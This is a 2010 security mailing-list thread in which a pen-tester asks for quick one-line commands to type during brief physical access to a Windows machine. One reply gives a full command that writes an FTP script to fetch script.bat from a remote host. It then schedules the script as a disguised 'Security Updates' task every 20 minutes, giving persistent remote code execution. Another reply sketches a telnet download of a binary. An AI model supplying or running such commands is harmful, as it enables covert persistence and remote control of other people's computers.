[Pauldotcom] Quick keyboard pwnage
Adrian Crenshaw
irongeek at irongeek.com
Wed Mar 17 01:52:26 UTC 2010
Nice, this is the sort of creative evil I'm looking for. :)
Thanks,
Adrian
On Tue, Mar 16, 2010 at 9:59 AM, Nathan Sweaney <NSweaney at tulsacash.com>wrote:
> Don't forget that telnet isn't installed by default on Vista & 7.
>
> What about something like this:
>
> echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >>
> %WINDIR%\ftp.scr & echo bill at gates.com >> %WINDIR%\ftp.scr & echo get
> script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp
> -s:ftp.scr > %WINDIR%\security.bat & echo start %WINDIR%\script.bat >>
> %WINDIR%\security.bat & schtasks /create /tn "Security Updates" /sc minute
> /mo 20 /tr security.bat
>
> I haven't tested it so I may have some syntax wrong, but the basic idea
> should work. Now your box just checks in every 20 minutes & does whatever
> you put in script.bat.
>
> If you wanted to get fancy, you could change script.bat to something like
> 123.123.123.123.bat (or whatever it's external IP is). Then just check your
> server logs to see who is connecting & you can customize your scripts to
> each location. That may take a little more fancy kung fu to get your
> external IP though.
>
> nathan
>
>
> -----Original Message-----
> From: pauldotcom-bounces at mail.pauldotcom.com [mailto:
> pauldotcom-bounces at mail.pauldotcom.com] On Behalf Of Josh Olson
> Sent: Monday, March 15, 2010 11:46 AM
> To: PaulDotCom Security Weekly Mailing List
> Subject: Re: [Pauldotcom] Quick keyboard pwnage
>
> Adrian,
>
> I haven't been able to make this work, but perhaps with some tweaking,
> telnet and edlin can do it?
>
> Something like:
>
> telnet -f binary.exe
> o site.com port
> GET /path/to/binary.exe
> quit
>
> Then edlin binary.exe /B
> 1,3d
> e
>
> Note that edlin doesn't ship with 64-bit versions of Windows.
>
> Josh
>
> On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <irongeek at irongeek.com>
> wrote:
> > Hi All,
> > I need some ideas. Let's way you are the Flash (or Quicksilver if
> you
> > prefer Marvel comics), and could type uberfast. You have no storage
> device
> > with you, but like I said, you can type really fast. If you had momentary
> > access to a physical box (Windows or Linux, but I'm most interest in
> > Widows), what command would you run as a pen-tester?
> >
> > Ideas to get us started:
> > 1. Net user add obviously would be an option for some. (this I know the
> > command for)
> > 2. Anyone know a way to enter a binary at the command line and quickly
> run
> > it?
> > 3. Wget functionally in windows would be nice, then you could just grab
> exes
> > you want quickly.
> > 4. Quickly upload files off of the target system to someplace you control
> on
> > the internet.
> >
> > Extra point for simple commands, quick to type, and on one line. If I use
> > your idea, I'll be sure to thank you in the project notes/comments.
> >
> > Thanks,
> > Adrian
> >
> >
> > _______________________________________________
> > Pauldotcom mailing list
> > Pauldotcom at mail.pauldotcom.com
> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > Main Web Site: http://pauldotcom.com
> >
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20100316/48d1d261/attachment.htm
More information about the Pauldotcom
mailing list